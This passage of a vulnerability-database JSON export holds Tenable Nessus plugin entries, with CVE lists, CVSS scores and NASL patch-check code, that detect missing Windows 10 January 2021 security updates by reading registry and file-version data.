(CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. 
(CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598230/windows-10-update-kb4598230\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8370504\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598230.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows 
: Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598230'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598230])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-02T20:36:16", "description": "The remote Windows host is missing security update 4598242.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2021-1637, CVE-2021-1645, CVE-2021-1656, CVE-2021-1663, CVE-2021-1670, CVE-2021-1672, CVE-2021-1676, CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-1705)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1657, CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1665, CVE-2021-1666, CVE-2021-1667, CVE-2021-1668, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-1679, CVE-2021-1691)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1642, CVE-2021-1646, CVE-2021-1648, CVE-2021-1649, CVE-2021-1650, CVE-2021-1651, CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1661, CVE-2021-1662, CVE-2021-1680, CVE-2021-1681, CVE-2021-1682, CVE-2021-1685, CVE-2021-1686, CVE-2021-1687, CVE-2021-1688, CVE-2021-1689, CVE-2021-1690, CVE-2021-1693, CVE-2021-1694, CVE-2021-1695, CVE-2021-1697, CVE-2021-1702, CVE-2021-1703, CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1638, CVE-2021-1669, CVE-2021-1674, CVE-2021-1678, CVE-2021-1683, CVE-2021-1684) \n - A memory corruption vulnerability exists. 
An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application (CVE-2021-1705)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598242: Windows 10 Version 2004 / Windows 10 Version 20H2 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", 
"CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1703", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598242.NASL", "href": "https://www.tenable.com/plugins/nessus/144874", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144874);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1663\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1670\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1691\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n 
\"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1703\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598242\");\n script_xref(name:\"MSFT\", value:\"MS21-4598242\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598242: Windows 10 Version 2004 / Windows 10 Version 20H2 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598242.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1637, CVE-2021-1645,\n CVE-2021-1656, CVE-2021-1663, CVE-2021-1670,\n CVE-2021-1672, CVE-2021-1676, CVE-2021-1696,\n CVE-2021-1699, CVE-2021-1708)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-1705)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\n\n - A denial of service (DoS) vulnerability. 
An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1691)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1642, CVE-2021-1646, CVE-2021-1648,\n CVE-2021-1649, CVE-2021-1650, CVE-2021-1651,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1662, CVE-2021-1680, CVE-2021-1681,\n CVE-2021-1682, CVE-2021-1685, CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1688, CVE-2021-1689,\n CVE-2021-1690, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1697, CVE-2021-1702,\n CVE-2021-1703, CVE-2021-1704, CVE-2021-1706,\n CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1638,\n CVE-2021-1669, CVE-2021-1674, CVE-2021-1678,\n CVE-2021-1683, CVE-2021-1684)\n \n - An memory corruption vulnerability exists. 
An attacker \n can exploit this to corrupt the memory and cause unexpected \n behaviors within the system/application (CVE-2021-1705)\");\n # https://support.microsoft.com/en-us/help/4598242/windows-10-update-kb4598242\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?307d4f43\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598242.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598242'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598242])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598242])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-03T14:52:43", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1685. 
(CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. 
(CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. 
(CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1692. 
(CVE-2021-1691)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683, CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598229: Windows 10 Version 1909 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", 